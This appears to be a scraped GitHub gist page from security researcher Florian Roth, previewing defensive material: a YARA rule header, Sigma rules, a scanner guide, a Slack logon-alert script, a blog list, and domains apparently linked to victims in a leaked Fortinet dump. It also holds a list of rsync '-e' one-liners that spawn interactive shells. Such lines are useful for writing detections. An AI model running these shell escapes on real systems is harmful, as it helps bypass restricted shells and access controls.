Florian Roth Neo23x0

rule MAL_BACKORDER_LOADER_WIN_Go_Jan23 {
meta:
description = "Detects the BACKORDER loader compiled in Go which downloads and executes a second stage payload from a remote server."
author = "Arda Buyukkaya (modified by Florian Roth)"
date = "2025-01-23"
reference = "EclecticIQ"
score = 80
tags = "loader, golang, BACKORDER, malware, windows"
hash = "70c91ffdc866920a634b31bf4a070fb3c3f947fc9de22b783d6f47a097fec2d8"
strings:
@Neo23x0
Neo23x0 / fortinet-domains.txt
Last active February 17, 2025 09:45
FortiGate Dump Domains - Grouped by TLD and Sorted Alphabetically
This is a list of the domains used in the contact email addresses found in the Fortinet dump file as published by Belsen Group and analysed by Kevin Beaumont on Mastodon: https://cyberplace.social/@GossiTheDog/113834848200229959
Some of these domains may just be the domains of free email services or service providers working for the actual victims.
AE
----------------------------------------------------------------------
acsllc.ae
aisdubai.ae
alhamra.ae
alrayan.ae
alshirawi.ae
# Basic Shell Escapes
rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e 'bash -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/bash -i' 127.0.0.1:/dev/null
rsync -e 'dash -c "dash 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/dash -i' 127.0.0.1:/dev/null
rsync -e 'zsh -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/zsh -i' 127.0.0.1:/dev/null
rsync -e 'ksh -c "ksh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/ksh -i' 127.0.0.1:/dev/null
@Neo23x0
Neo23x0 / sigma_correlation_failed_login_success.yml
Last active December 4, 2023 10:00
Sigma - Correlation Rule
title: Correlation - Multiple Failed Logins Followed by Successful Login
id: b180ead8-d58f-40b2-ae54-c8940995b9b6
status: experimental
description: Detects multiple failed logins by a single user followed by a successful login of that user
references:
- https://reference.com
author: Florian Roth (Nextron Systems)
date: 2023/06/16
correlation:
type: temporal
@Neo23x0
Neo23x0 / sigma-evtx-scan.md
Last active December 11, 2024 06:36
Guide to Use Sigma EVTX Checker

Guide to Use Nextron's Sigma EVTX Checker

It's a fast Go-based scanner for Linux, Windows, and macOS that applies Sigma rules and outputs the matches as JSON.

Clone the Sigma Repository and cd into it

git clone https://github.com/SigmaHQ/sigma.git
cd sigma
@Neo23x0
Neo23x0 / link-tree.md
Created December 18, 2022 18:48
My Link List
@Neo23x0
Neo23x0 / nighthawk-blog-posts.md
Last active August 1, 2023 21:53
Collection of Deleted Articles on MDSec's Nighthawk
@Neo23x0
Neo23x0 / send-to-slack.sh
Created September 11, 2022 21:22
Slack Hook - System Logon
#!/bin/bash -x
# Collect the local hostname and the client address of the current SSH session
hostname=$(hostname)
source=$(echo "$SSH_CONNECTION" | cut -d' ' -f 1)
# Resolve the source address to a country with geoiplookup (requires the geoip package)
geo=$(geoiplookup "$source")
# Post a one-line logon notification to the Slack incoming webhook (replace the placeholder URL)
curl -X POST --silent --data "payload={\"text\": \":bust_in_silhouette: SYSTEM: $hostname USER: $USER SOURCE: $source GEO: $geo\"}" https://hooks.slack.com/services/XXXXXXXX_YOURHOOK_XXXXX > /dev/null
@Neo23x0
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/
@Neo23x0
Neo23x0 / nvidia_cert_leak_vt_dorks.md
Created March 5, 2022 12:49
Samples Signed with NVIDIA Certs